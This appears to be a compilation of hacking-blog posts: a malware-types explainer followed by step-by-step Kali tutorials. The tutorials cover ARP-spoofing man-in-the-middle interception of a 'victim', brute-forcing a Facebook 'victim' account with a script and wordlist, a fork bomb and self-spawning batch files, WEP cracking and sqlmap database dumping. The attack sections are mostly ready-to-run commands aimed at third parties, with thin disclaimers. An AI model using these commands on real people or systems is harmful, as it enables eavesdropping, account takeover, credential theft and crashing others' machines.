What Is the Difference: Viruses, Worms, Ransomware, Trojans, Bots, Malware, Spyware etc?

If you’re a regular or even an occasional computer user, then you might’ve heard the terms like Viruses, Worms, Trojans, Bots, Malware, Spyware, etc. But honestly speaking, we consider all these to be a Virus, no matter, whatever be their type. But have you ever tried to acknowledge, what is the difference between these terms, although they are meant to harm your device, steal your data or spy on you, have you ever thought why they are named so differently. Basically, terms like Viruses, Trojans are all types of malicious software or simply ‘Malware’.

Now, the first and foremost question arises, where did these terms came from?Clearly, they are not some out of the world aliens, in fact the real truth is that they were not even created with an intention to harm someone.

The history of malware attacks goes back to 1949, when John von Neumann, first developed the theoretical base for self-duplicating automation programs, but the technical implementation was not feasible at that time. The term ‘Computer Virus’ was first used by Professor Leonard M. Adleman in 1981, while in conversation with Fred Cohen.

The first computer virus named ‘Brain’ was coded by two brothers Basit Farooq Alvi and Amjad Farooq Alvi, who were from Lahore, Pakistan. Brain was meant to infect storage media based on MS-DOS FAT file systems. It was originally designed to infect the IBM PC, it replaced the boot sector of its floppy disk with the virus. The virus program changed the disk label to ©Brain and the defected boot sectors displayed this message:

Welcome to the Dungeon (c) 1986 Basit & Amjads (pvt) Ltd VIRUS_SHOE RECORD V9.0 Dedicated to the dynamic memories of millions of viruses who are no longer with us today – Thanks GOODNESS!! BEWARE OF THE er..VIRUS : this program is catching program follows after these messages….$#@%$@!!

However, as you may presume, there was no evil intention behind this. Alvi brothers said in their interview with TIME magazine, they created the virus only to protect their medical software from piracy, aimed at copyright infringement acts.

Coming back to Malware, these are malicious software designed to harm a computer which may or may not be connected to a network. Malware only get in to action when there is a computer involved in the game otherwise the term Malware is of no use.

Malware are of the following types:

Worms: These programs have the ability to replicate themselves. Their sole objective is to increase their population and transfer themselves to another computers via the internet or through storage media, all the work is done like a top secret mission hiding their movement from the user. They don’t cause any harm to the computer, their replicating nature consumes hard drive space, thus slow down the machine. Some of the notable worms are, SQL Blaster which slowed the internet for a small period of time, Code Red took down almost 359,000 websites.

Viruses: They also have the ability to replicate themselves, but they do damage files on the computer they attack. Their main weakness lies in the fact, they can get into action only if they have the support of a host program, otherwise they’re just like a defeated warrior. They stick themselves to songs, videos, and executable files and travel all over the internet. W32.Sfc!mod, ABAP.Rivpas.A, Accept.3773 are some of the examples of Virus programs.

The Virus Gang:

File Viruses
Macro Viruses
Master Boot Record Viruses
Boot sector Viruses
Multi-Partite Viruses
Polymorphic Viruses
Stealth Viruses

Feel free to Google anyone of them if you like.

Trojans: Basically, Trojans are no Viruses, and are not meant to damage or delete files on your system. Their sole task is to provide to a backdoor gateway for malicious programs or malevolent users to enter your system and steal your valuable data without your knowledge and permission. JS.Debeski.Trojan is an example of Trojan.

They are named after the ‘Trojan Horse’ tale, in which Greeks entered the city of Troy with the help of a wooden horse which was meant to be a gift, but turned out to be a sweet poison, as depicted in the movie Troy.

The Trojan Gang:

Remote Access Trojans
Data Sending Trojans
Destructive Trojans
Proxy Trojans
FTP Trojans
Security Software Disabler Trojans
Denial-Of-Service Attack Trojans

Feel free to Google anyone of them if you like.

Adware: Adware are used to display advertisements in the programs. They generally come attached with software programs that are free to use as they are the only source of revenue for the developers of those software programs. Adware can’t be completely called as Malware as they have no intention to harm your machine, they only track what advertisements you’re more interested in, so as to display the relevant advertisements on your screens.

Spyware: These programs also come attached with other freeware software, track your browsing and other personal details and send it to a remote user. They can also facilitate installation of unwanted software from the internet. Unlike Adware, they work as a standalone program and do their operations silently.

Spam: You get very irritated when you receive unwanted emails from unknown senders, these are called Spams or junk mails. And the process of flooding the internet with the same message is called Spamming, is done for the purpose of commercial advertising. These junk mails may sometimes contain Viruses or Trojans that enter your system as soon as you open the mail.

Bots: Bots or Robots are automated processes that are designed to interact over the internet without the need of human interaction. They can be used for good and bad intentions. An evil minded person can create a malicious Bot that is capable of infecting the host on its own. After transmitting itself to the host device, a Bot creates a connection with central servers which act as the command centers for the infected hosts attached to that network, called Botnet.

Their skills include stealing passwords, logging keystrokes, analyzing network traffic, relay spam, launch DoS (Denial of Service) attacks and open back doors on infected hosts. These Bots can be seen as the advanced form of Worms, their infection rate and tactic is more effective than those of Worms. These malicious Bots are created after a lot of hard work done by their malignant creators.

Ransomware: These type of malware alter the normal operation of your machine, thus barring you to use it properly. Thereafter, these programs display warning messages asking for money to get your device back to normal working condition.

After reading all this, you might be thinking why people create Malware. Here are some reasons which may compel a coder to write malware codes:

• Take control of a person’s computer for personal or professional reasons.
• To get financial benefits.
• To steel confidential data.
• To prove their point regarding a security breach can be done on a system.
• To take down an individual computer or a complete network.

and many more….

How can you protect your Computer :

• Keep your system up to date.
• Use genuine software.
• Install an antivirus software and update it regularly.
• Set-up a firewall, may it be custom as provided by antivirus software. Windows has an in-built firewall option in case you don’t want to use a custom firewall.
• Never open unknown emails that generally reside in your Spam folder.
• Never open unknown links, use online website safety checker tools if you’re not sure to open a website.

By taking these simple measures, you can effectively keep your machine free from Malware and other potential threats.

Read More

Kali Linux (MITM ATTACK)

Today our tutorial will talk about Kali Linux Man in the Middle Attack. How to perform man in the middle attack using Kali Linux?we will learn the step by step process how to do this.
I believe most of you already know and learn about the concept what is man in the middle attack, but if you still don't know about this, here is some definition from wikipedia.

The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.

Scenario:
This is the simple scenario, and I try to draw it in a picture.

Victim IP address : 192.168.8.90
Attacker network interface : eth0; with IP address : 192.168.8.93
Router IP address : 192.168.8.8
Requirements:
1. Arpspoof
2. Driftnet
3. Urlsnarf

Step by step Kali Linux Man in the Middle Attack :

1. Open your terminal (CTRL + ALT + T kali shortcut) and configure our Kali Linux machine to allow packet forwarding, because act as man in the middle attacker, Kali Linux must act as router between "real router" and the victim. Read the tutorial here how to set up packet forwarding in linux.
2. You can change your terminal interface to make the view much more friendly and easy to monitor by splitting kali linux terminal window.
3. The next step is setting up arpspoof between victim and router.

arpspoof -i eth0 -t 192.168.8.90 192.168.8.8

4. And then setting up arpspoof from to capture all packet from router to victim.

arpspoof -i eth0 192.168.8.8 192.168.8.90

5. After step three and four, now all the packet sent or received by victim should be going through attacker machine.

6. Now we can try to use driftnet to monitor all victim image traffic. According to its website,

Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.

7. To run driftnet, we just run this

driftnet -i eth0

When victim browse a website with image, driftnet will capture all image traffic as shown in the screenshot below.

To stop driftnet, just close the driftnet window or press CTRL + C in the terminal
8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code

urlsnarf -i eth0

and urlsnarf will start capturing all website address visited by victim machine.
9. When victim browse a website, attacker will know the address victim visited.

Read More

Brute Force Facebook Passwords (99% Working!)

Note: This Article Is Not For Noobs! Learners Are Welcomed! This Article Is For Educational Purposes Only, Any Misuse Of Information Given Below Is Prohibited! 

Hi Guys! I am back with a fresh tutorial here, and this time its on hacking facebook! The method I am going to use here will be brute forcing, Using World’s Best Passwords Dictionary, CrackStation,

So, First lets know something about Brute force attacks,

“A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.”

But, In our case I’ll be using a Python script and a Long Dictionary Of passwords. I have personally tried it on myself and it really works  .

Here’s the list of what we need:

• A Kali Machine / Or Any Python Engine Will work!
• Facebook.py ( v1 only)
• And, A FaceBook id Of course :p
• CrackStation Word List! (Download Here)

Now, Lets Start The Work!

step 1. Install Python-mechanize using command mention below

[*] root@HaCoder:~#apt-get install python-mechanize

step 4.
Add facebook.py using the command below
[*] root@HaCoder~# chmod +x facebook.py

[*] root@HaCoder:~# python facebook.py

step 5.
Now enter |Email| or |Phone number| or |Profile ID number| or |Username| of the victim,     You can use graph.facebook.com for more information!

Step 6 .

Now Give The Path Of Your CrackStation Word list !

step 7.
Now it will try all passwords present in the word list, So relax and have a cup of coffee because it will take time depending on speed of your processor and password strength of your victim!

Hope this article was helpful  Any feedback or Questions? Leave a Comment And I’ll be Happy To Help 

Read More

Denial Of Service Attacks : Explained for Beginners and Dummies

Just like most other things associated with hacking, a denial of service attack is not everyone's cup of tea. It, however, can be understood if explained properly. In this tutorial, I'll try to give you a big picture of denial of service attacks, before I start using geeky terms like packets and all that. We'll start at the easiest point.

What effect does a denial of service attack have

Wireless hacking usually gives you the password of a wireless network. A man in the middle attack lets you spy on network traffic. Exploiting a vulnerability and sending a payload gives you access and control over the target machine. What exactly does a Denial of Service (DOS) attack do? Basically, it robs the legitimate owner of a resource from the right to use it. I mean if I successfully perform a DOS on your machine, you won't be able to use it anymore. In the modern scenario, it is used to disrupt online services. Many hacktivist groups (internet activists who use hacking as a form of active resistance - a name worth mentioning here is Anonymous) do a Distributed Denial of service attack on government and private websites to make them listen to the people's opinion (the legitimacy of this method of dictating your opinion has been a topic of debate, and a lot of hactivists had to suffer jailtime for participating in DDOS). So basically it's just what its name suggests, Denial Of Service.

Basic Concept

It uses the fact that while a service can be more than sufficient to cater to the demands of the desired users, a drastic increase in unwelcome users can make the service go down. Most of us use the words like "This website was down the other day" without any idea what it actually means. Well now you do. To give you a good idea of what is happening, I'll take the example from the movie "We Are Legion".

Scenario One : Multiplayer online game

Now consider you are playing an online multi-player game. There are millions of other people who also play this game. Now there's a pool in the game that everyone likes to visit. Now you and your friends know that they have the power of numbers. There are a lot of you, and together you decide to make identical characters in the game. And then all of you go and block the access to the pool. You just carried out a denial of service attack. The users of the game have now been deprived of a service which they had obtained the right to use when they signed up for the game. This is just what the guys at 4chan (birthplace and residence of Anonymous) did a long time ago. This is the kind of thing that gives you a very basic idea what a denial of service attack can be.

They made a Swastika and blocked access to the pool

Scenario 2 : Bus stop

Now assume that due to some reason, you want to disrupt the bus service of your city and stop the people from using the service. To stop the legitimate people from utilizing this service, you can call your friends to unnecessarily use it. Basically you can invite millions of friends to come and crowd around all the bus stops and take the buses without any purpose. Practically it is not feasible since you don't have millions of friends, and they are definitely not wasting their time and money riding aimlessly from one place to another.

So while this may seem impossible in the real world, in the virtual world, you can cause as much load as a thousand (or even a million) users alone at the click of a button. There are many tools out there for this purpose, however, you are not recommended to use them as a DOS on someone else is illegal, and easy to detect (Knock, knock. It's the police). We will, come back to this later, and do a DOS on our own computer.

How denial of service attacks are carried out

Basically, when you visit a website, you send them a request to deliver their content to you. What you send is a packet. Basically, it take more than just one packet, you need a lot of them. But still, the bandwidth that you consume in requesting the server to send you some data is very little. In return, the data they send you is huge. This takes up server resources, for which they pay for. A legitimate view can easily earn more than the server costs on account of advertisements, etc. So, companies buy server that can provide enough data transfer for its regular users. However, if the number of users suddenly increases, the server gives up. It goes down. And since the company knows it under DOS, it just turns off the server, so that it does not have to waste its monetary resources on a DOS, and wait till the DOS stops. Now with the modern computers and bandwidth, we alone can easily pretend to be a thousand or even more users at once. While this is not good for the server, it is not something that can make it succumb (your computer is not the only thing that gets better with time, the servers do too). However, if a lot of people like you do a DOS attack, it becomes a distributed denial of service attack. This can easily be fatal for a server. It's just like you go to a page, and start refreshing it very fast, maybe a thousand times every second. And you are not the only one. There are thousand others that are doing the same thing. So basically you guys are equivalent to more than a million users using the site simultaneously, and that's not something the server can take. Sites like Google and Facebook have stronger servers, and algorithms that can easily identify a DOS and block the traffic from that IP. But it's not just the websites that get better, and the black hat hackers too are improving every day. This leaves a huge scope for understanding DOS attacks and becoming an asset to one of these sides ( the good, the bad and the ugly). 

A Live DOS on your Kali Machine

If you have Kali linux (The hackers OS- the OS of choice if you use this blog) the here's a small exercise for you. 

We are going to execute a command in the Kali linux terminal that will cripple the operating system and make it hand. It will most probably work on other linux distributions too.

Warning : This code will freeze Kali linux, and most probably it will not recover from the shock. You'll lose any unsaved data. You will have to restart the machine the hard way (turn of the virtual machine directly or cut the power supply if its a real machine). Just copy paste the code and your computer is gone.

:(){ :|:& };:

The machine froze right after I pressed enter. I had to power it off from the Vmware interface.

What basically happened is that the one line command asked the operating system to keep opening process very fast for an infinite period of time. It just gave up.

Here's something for the Windows Users

Crashing Windows Using Batch file

Open a notepad. Put the following code in it-

:1
Start
goto 1

Save the file as name.bat

Bat here is batch file extension. Run it. Game over.

It basically executes the second line, and the third line makes it go over to the first, execute the second, and then over to first again, execute the second..... infinitely. So again, denial of service. All the processing power is used by a useless command, while you, the legitimate user, can't do anything.

That's it for this tutorial, we'll discuss the technical details of a practical denial of service in a later tutorial.

PS:
As suggested in the comments, this script will crash windows much faster-

:1
bash name.bat
goto 1

If you look at the script carefully, it is quite easy to understand what it does. Everytime the script is executed, it does two things-

1. Opens another instance of the same script
2. Goes to the beginning of the script

So for every execution, the number of scripts slowing down your computer doubles up. This means that instead of linear, the load on memory and processor is now exponential (the script gets more and more dangerous with time).

Read More

Wifi Hacking - WEP - Kali Linux Aircrack-ng suite

Firstly, create a wireless network to crack. Don't use this method on others. It is illegal. Then proceed with the steps below.

1. Find out the name of your wireless adapter.

Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-

• lo - loopback. Not important currently.
• eth - ethernet
• wlan - This is what we want. Note the suffix associated.

Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.

2. Enable Monitor mode

Now, we use a tool called airmon-ng to  create a virtual interface called mon. Just type 

airmon-ng start wlan0

 Your mon0 interface will be created.

3. Start capturing packets

Now, we'll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You'll see the name of the wifi you want to hack.

airodump-ng mon0

4. Store the captured packets in a file 

This can be achieved by giving some more parameters with the airodump command

airodump-ng mon0 --write name_of_file

Now the captured packets will be stored in name_of_file.cap
You have to wait till you have enough data (10000 minimum)

5. Crack the wifi

If all goes well ,then you'll be sitting in front of your pc, grinning, finally you've got 10000 packets (don't stop the packet capture yet). Now, you can use aircrack-ng to crack the password. (in a new terminal)

aircrack-ng name_of_file-01.cap 

The program will ask which wifi to crack, if there are multiple available. Choose the wifi. It'll do its job. If the password is weak enough, then you'll get it in front of you. If not, the program will tell you to get more packets. The program will retry again when there are 15000 packets, and so on.

Read More

Hacking Website with Sqlmap in Kali Linux

A screenshot from the SQLmap official website

Kali Linux

First off, you need to have Kali linux (or backtrack) up and running on your machine. Any other Linux distro might work, but you'll need to install Sqlmap on your own. 

Sqlmap

Basically its just a tool to make Sql Injection easier. Their official website  introduces the tool as -"sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections."

A lot of features can be found on the SqlMap website, the most important being - "Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems." That's basically all the database management systems. Most of the time you'll never come across anything other than MySql. 

Hacking Websites Using Sqlmap in Kali linux

Sql Version

Boot into your Kali linux machine. Start a terminal, and type -

sqlmap -h

It lists the basic commands that are supported by SqlMap. To start with, we'll execute a simple command
sqlmap -u <URL to inject>. In our case, it will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Sometimes, using the --time-sec helps to speed up the process, especially when the server responses are slow.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

Either ways, when sqlmap is done, it will tell you the Mysql version and some other useful information about the database.

The final result of the above command should be something like this.

Note: Depending on a lot of factors, sqlmap my sometimes ask you questions which have to be answered in yes/no. Typing y means yes and n means no. Here are a few typical questions you might come across-

• Some message saying that the database is probably Mysql, so should sqlmap skip all other tests and conduct mysql tests only. Your answer should be yes (y).
• Some message asking you whether or not to use the payloads for specific versions of Mysql. The answer depends on the situation. If you are unsure, then its usually better to say yes.

Enumeration

Database

In this step, we will obtain database name, column names and other useful data from the database.

List of  a few common enumeration commands

So first we will get the names of available databases. For this we will add --dbs to our previous command. The final result will look like -

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

 So the two databases are acuart and information schema.

Table

Now we are obviously interested in acuart database. Information schema can be thought of as a default table which is present on all your targets, and contains information about structure of databases, tables, etc., but not the kind of information we are looking for. It can, however, be useful on a number of occasions. So, now we will specify the database of interest using -D and tell sqlmap to enlist the tables using --tables command. The final sqlmap command will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

The result should be something like this -
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

Now we will specify the database using -D, the table using -T, and then request the columns using --columns. I hope you guys are starting to get the pattern by now. The most appealing table here is users. It might contain the username and passwords of registered users on the website (hackers always look for sensitive data).

The final command must be something like-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

The result would resemble this-

Data

Now, if you were following along attentively, now we will be getting data from one of the columns. While that hypothesis is not completely wrong, its time we go one step ahead. Now we will be getting data from multiple columns. As usual, we will specify the database with -D, table with -T, and column with -C. We will get all data from specified columns using --dump. We will enter multiple columns and separate them with commas. The final command will look like this.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump

 Here's the result

John Smith, of course. And the password is test. Email is email@email.com?? Okay, nothing great, but in the real world web pentesting, you can come across more sensitive data. Under such circumstances, the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP. Don't get tempted to join the dark side. You don't look pretty behind the bars. That's it for this tutorial. Try to look at other columns and tables and see what you can dig up. Take a look at the previous tutorial on Manual SQl Injection which will help you find more interesting vulnerable sites.

Read More

How To Open CMD In Desired Folder

Just hold down the Shift key and right-click on the desktop.

And then you can choose “Open Command Window Here” from the menu. The great thing about this is that the current path is the desktop, which is convenient for manipulating files on the desktop.

Of course you can always right-click on any folder icon in the system while holding down the shift key.

Read More

How To Lock And Unlock Your Computer With Pendrive

Just follow the steps as given below :- 

Insert your USB drive into your system and wait for it to be recognized..

STEP 1: Go to Start >Control Panel >Administrative Tools >Computer Management >Disk Management >

Or

You can go directly by typing the command in run: diskmgmt.msc

Then right-click the partition whose name you want to change (click in the white area just below the word “Volume”) and select “change drive letter and paths.”

From here you can re-assign the drive letter it was given to “A”

NOTE:Drive letter of Pendrive must be "A"

STEP 2:- Start->Run->syskey

click on "ok"

Syskey launched: Click “Update”

Choose “Store Startup key on floppy disk” and click “OK”

You’ll be prompted to enter your diskette. Make sure your USB drive is inserted and writable.

Restart and have fun. Don’t lose your USB disk! Also, to revert this, you can run syskey again and choose to store it locally instead of “on a floppy disk”.

Read More